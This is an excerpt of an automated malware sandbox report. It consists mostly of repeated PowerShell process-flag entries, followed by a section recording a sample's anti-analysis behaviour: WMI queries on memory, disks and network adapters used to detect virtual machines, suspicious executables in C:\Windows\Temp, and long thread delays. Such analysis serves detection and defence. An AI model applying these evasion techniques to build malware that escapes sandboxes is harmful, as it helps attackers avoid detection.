Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Source: C:\Windows\Temp\svczHost.exe	Memory allocated: 2C4ACF50000 memory reserve \| memory write watch
Source: C:\Windows\Temp\myRdpService.exe	Memory allocated: 252A8340000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9898	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9846	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9706	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 369
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9929
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9910
